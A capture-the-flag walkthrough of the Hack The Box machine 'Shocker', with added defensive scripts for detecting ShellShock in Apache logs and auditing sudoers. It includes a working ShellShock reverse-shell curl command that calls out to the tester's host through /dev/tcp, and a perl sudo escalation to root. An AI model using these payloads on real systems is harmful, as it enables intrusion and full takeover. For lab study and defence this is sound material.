TJ_Null’s OSCP Prep – HTB – Shocker

This box is rated easy, and for good reason; still, I spent a good amount of time just enumerating because the initial access was hidden well. For anyone who has encountered this vulnerability before it would be a piece of cake, but I had never encountered ShellShock, so I spent a lot of time enumerating. Rooting the box was as simple as one command.


Enumeration

I'll start off with an nmap scan to get an idea of what's running on the machine.

└─# nmap -sC -sV 10.10.10.56 -oN nmap.result                                                                                                                                                                    
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-11 16:45 EST
Nmap scan report for 10.10.10.56
Host is up (0.031s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesnt have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.58 seconds

Only two ports, 80 and 2222. OpenSSH is listening on an uncommon port. That, however, leads nowhere, so it will be ignored in the remainder of this writeup.

Visiting the webserver we are welcomed by this page. A very simple page with not much content.

<!DOCTYPE html>
<html>
<body>

<h2>Don't Bug Me!</h2>
<img src="bug.jpg" alt="bug" style="width:450px;height:350px;">

</body>
</html>

Using gobuster to find hidden directories.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/12 14:31:38 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/cgi-bin/             (Status: 403) [Size: 294]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 299]
                                               
===============================================================
2022/01/12 14:31:52 Finished
===============================================================

Nothing noteworthy. After a lot of enumeration I started looking at /cgi-bin/. After some googling I found this.

ShellShock

Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an attacker can tack-on malicious code to the environment variable, which will run once the variable is received.

https://book.hacktricks.xyz/pentesting/pentesting-web/cgi

How Does ShellShock Work?

In layman’s terms, Shellshock is a vulnerability that allows systems containing a vulnerable version of Bash to be exploited to execute commands with higher privileges. This allows attackers to potentially take over that system.

https://securityintelligence.com/articles/shellshock-vulnerability-in-depth/

So after reading this I edited my gobuster dir search and found a file, user.sh.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# gobuster dir -u http://10.10.10.56/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -x cgi,sh,jpg,txt,html,php -b 403,404
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              cgi,sh,jpg,txt,html,php
[+] Timeout:                 10s
===============================================================
2022/01/12 14:45:13 Starting gobuster in directory enumeration mode
===============================================================
/user.sh              (Status: 200) [Size: 118]
                                               
===============================================================
2022/01/12 14:47:05 Finished
===============================================================

Reading the file:

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# cat user.sh                                
Content-Type: text/plain

Just an uptime test script

 14:07:18 up 21:24,  0 users,  load average: 0.19, 0.09, 0.03

Initial Access

As mentioned earlier, the server is vulnerable to ShellShock, a vulnerability in Bash that allows us to execute arbitrary commands and gain a remote shell on the machine.

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.10.17/4444 0>&1' http://10.10.10.56/cgi-bin/

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/shocker]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.56] 42834
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ ls
ls
user.sh
shelly@Shocker:/usr/lib/cgi-bin$ pwd 
pwd
/usr/lib/cgi-bin
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$ 
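From the defender's side, the ShellShock section above and the User-Agent delivery used here have one thing in common: the payload always begins with bash's exported-function syntax `() {`, and Apache's combined log keeps the User-Agent and Referer fields verbatim. The script below is an added example, not code from the writeup or from the box; it parses combined-format lines, flags that marker, and separates attempts (a 403 on the /cgi-bin/ directory) from requests that actually reached a CGI script. The log lines are constructed for the demo (192.0.2.10 is a documentation address) and the field names and the `executed` heuristic are this example's own choices.

```python
import re

# Apache "combined" LogFormat:
#   host ident user [time] "request" status size "referer" "user-agent"
# Apache writes \" for a literal quote inside a header, so each quoted field is
# matched as a run of non-quote characters or backslash escapes.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# The ShellShock trigger is bash's exported-function syntax at the start of an
# environment variable value: "() {" (whitespace between the tokens optional).
# mod_cgi copies request headers into the script's environment as HTTP_*, and
# this token rarely appears in legitimate headers, so it is a cheap marker.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Header-derived fields that the combined format preserves. Cookie and custom
# headers are exported to CGI too but are not logged by default: the main
# blind spot of log-based detection for this bug.
CHECKED_FIELDS = ("agent", "referer", "request")

# Constructed sample log (not the box's real access log).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jan/2022:14:31:40 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Jan/2022:14:47:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "gobuster/3.1.0"',
    '192.0.2.10 - - [12/Jan/2022:14:50:12 +0000] "GET /cgi-bin/ HTTP/1.1" 403 294 "-" "() { :; }; echo shellshock-test"',
    '192.0.2.10 - - [12/Jan/2022:14:51:03 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { :;}; echo shellshock-test" "curl/7.74.0"',
    'not a log line at all',
]


def has_shellshock_marker(value):
    """True if a header value carries the exported-function marker."""
    return SHELLSHOCK_RE.search(value) is not None


def find_shellshock(lines):
    """Return one finding per combined-format line whose logged fields carry the marker."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format (or truncated); skip rather than guess
        for field in CHECKED_FIELDS:
            if not has_shellshock_marker(m.group(field)):
                continue
            parts = m.group("request").split()
            path = parts[1] if len(parts) >= 2 else m.group("request")
            findings.append({
                "host": m.group("host"),
                "time": m.group("time"),
                "path": path,
                "field": field,
                "status": int(m.group("status")),
                # Heuristic (assumption): only a 2xx under /cgi-bin/ means a CGI
                # script ran with the attacker-controlled environment; a 403 on
                # the directory itself is an attempt that never reached bash.
                "executed": path.startswith("/cgi-bin/") and m.group("status").startswith("2"),
            })
            break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
```

Run as-is it reports the two marker-bearing lines; feed it `access.log` line by line for a real review. Because the marker sits in the environment, not the URL, a URL-only WAF rule or a grep on the request path misses it; the header fields are where it lives.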

Root

Getting root on this was extremely easy. After doing the usual enumeration I found that the user shelly could run perl with sudo.

shelly@Shocker:/$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/$ sudo perl -e 'exec "/bin/sh";'
# id
uid=0(root) gid=0(root) groups=0(root)
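The root step works because a NOPASSWD rule for an interpreter is a root rule in disguise: perl (like python, bash, vim and the rest of the GTFOBins set) can spawn a shell, so the one command above is all it takes. The audit below is an added example, not part of the writeup; it parses sudoers user specifications and `sudo -l` output, and flags root-equivalent rules on shell-capable binaries, rating them critical when no password is required. The `SHELL_CAPABLE` list, the severity labels and the sample sudoers fragment are this example's own assumptions; aliases (`Cmnd_Alias` and friends) are not expanded.

```python
import os
import re

# Binaries that can spawn a shell or run arbitrary code when executed as root;
# sudo rights on any of them are root-equivalent. Illustrative list (assumption),
# not exhaustive; GTFOBins tracks the full set.
SHELL_CAPABLE = {
    "perl", "python", "python2", "python3", "ruby", "node", "php", "lua",
    "bash", "sh", "dash", "zsh", "ksh", "vim", "vi", "nano", "less", "more",
    "find", "awk", "gawk", "env", "nmap", "tar", "zip",
}

# sudoers user specification:  user  host=(runas) [TAG: ...] cmd [, cmd ...]
SPEC_RE = re.compile(
    r"^(?P<user>[^\s#]\S*)\s+(?P<host>\S+?)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<body>.+)$"
)
# entry line in `sudo -l` output:  (runas) [TAG: ...] cmd [, cmd ...]
SUDO_L_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<body>.+)$")
TAG_RE = re.compile(r"^((?:[A-Z_]+:\s*)+)")
SKIP_PREFIXES = ("#", "Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")

# Constructed sudoers fragment for the demo (not the box's real /etc/sudoers).
SAMPLE_SUDOERS = [
    "Defaults env_reset",
    "root    ALL=(ALL:ALL) ALL",
    "%admin  ALL=(ALL) ALL",
    "shelly  ALL=(root) NOPASSWD: /usr/bin/perl",
    "deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart myapp, /usr/bin/id",
]

# The relevant part of the `sudo -l` output quoted in the writeup.
SHOCKER_SUDO_L = """User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
"""


def _runas_user(runas):
    # "(ALL:ALL)" -> "ALL"; "(root)" -> "root"; no runas list -> sudo's default, root
    return (runas or "root").split(":")[0].strip() or "root"


def _parse_body(body):
    """Split 'NOPASSWD: /usr/bin/perl, /usr/bin/id' into [(tags, cmd), ...].
    In sudoers a tag applies to every command that follows it in the list."""
    commands, tags = [], frozenset()
    for chunk in body.split(","):
        chunk = chunk.strip()
        t = TAG_RE.match(chunk)
        if t:
            tags = frozenset(x.strip() for x in t.group(1).split(":") if x.strip())
            chunk = chunk[t.end():].strip()
        if chunk:
            commands.append((tags, chunk))
    return commands


def entries_from_sudoers(lines):
    """Yield (user, runas_user, commands) for each user spec in sudoers text."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if m:
            yield m.group("user"), _runas_user(m.group("runas")), _parse_body(m.group("body"))


def entries_from_sudo_l(text, user):
    """Same, from the output of `sudo -l` run as `user`."""
    for line in text.splitlines():
        m = SUDO_L_RE.match(line.strip())
        if m:
            yield user, _runas_user(m.group("runas")), _parse_body(m.group("body"))


def audit(entries):
    findings = []
    for user, runas, commands in entries:
        if user == "root" or runas not in ("root", "ALL"):
            continue  # root's own rule, or a runas target that is not root-equivalent
        for tags, cmd in commands:
            name = os.path.basename(cmd.split()[0])
            # Fixed arguments do not rescue an interpreter rule: whoever can write
            # the script it points at still gets root, so the binary itself is flagged.
            if cmd != "ALL" and name not in SHELL_CAPABLE:
                continue
            findings.append({
                "user": user,
                "command": cmd,
                "nopasswd": "NOPASSWD" in tags,
                # Password-less plus shell-capable: anyone who lands a shell as this
                # user is root with one command, which is exactly the Shocker case.
                "severity": "critical" if "NOPASSWD" in tags else "high",
            })
    return findings


if __name__ == "__main__":
    for f in audit(entries_from_sudoers(SAMPLE_SUDOERS)):
        print(f)
    for f in audit(entries_from_sudo_l(SHOCKER_SUDO_L, "shelly")):
        print(f)
```

The fix on the box side is the usual one: grant the specific script that needs root (with fixed arguments and a file nobody else can write) rather than the interpreter, and keep NOPASSWD for non-interactive accounts only where the command is genuinely constrained.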
